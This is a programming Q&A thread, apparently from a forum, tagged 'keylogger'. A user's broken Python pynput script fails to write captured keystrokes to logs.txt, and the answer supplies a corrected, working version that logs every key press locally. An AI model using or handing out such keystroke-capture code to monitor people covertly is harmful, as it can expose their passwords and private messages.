# PYTHON. It doesn't create or write the keys into the file

Tags: python, keylogger

import pynput

from pynput.keyboard import Key, Listener

count = 0
Keys = []

def on_press(key):
global keys, count
keys.append(key)
count +=1

```
print("{0} pressed".format (key))

if count >=5:
    count = 0
    write_file(keys)
    keys = []

    def write_file(keys):
        with open("logs.txt", "a") as f:
            for key in keys:
                k = str(key).replace("'" ",")
                if k.find("space") > 0:
                    f.write('\n')
                elif k.find("Key") == -1:
                    f.write(k)
```

def on_press(key):
print("{0} pressed".format(key))

def on_release(key):
if key == Key.esc:
return False

with Listener(on_press=on_press, on_release=on_release) as listener:
listener.join()

Comment: You only define the function `write_file` after count equals 5. You should define the function outside of the if loop. Also, you don't actually call the function, you just define it. 
If you want it on press, add it to the `on_press` function. 
Also, it's quite common to include all code in the triple tilde's ```, and write an explanation of your problem.

Comment: can u edit my code because ? i dont really understand.

Answer (score 0):

Few errors in your code.

- Keys definition should be lowercase, or at least consistent with the rest.
- `write_file()` should be defined outside the `if`-loop. Otherwise the function won't exist.
- `write_file()` was never called. This should be called inside the `on_press()` function.

```py
import pynput
from pynput.keyboard import Key, Listener


count = 0 
keys = []

def write_file(keys):
    with open("logs.txt", "a") as f:
        for key in keys:
            k = str(key).replace("'", ",")
            if k.find("space") != -1:
                f.write('\n')
            elif k.find("Key") == -1:
                f.write(k)

def on_press(key):
    
    global keys, count
    keys.append(key) 
    count += 1
    if count >=5:
       count = 0
       write_file(keys)
       keys = []
    print("{0} pressed".format(key))

def on_release(key):
    if key == Key.esc: 
        return False

with Listener(on_press=on_press, on_release=on_release) as listener: 
    listener.join()
```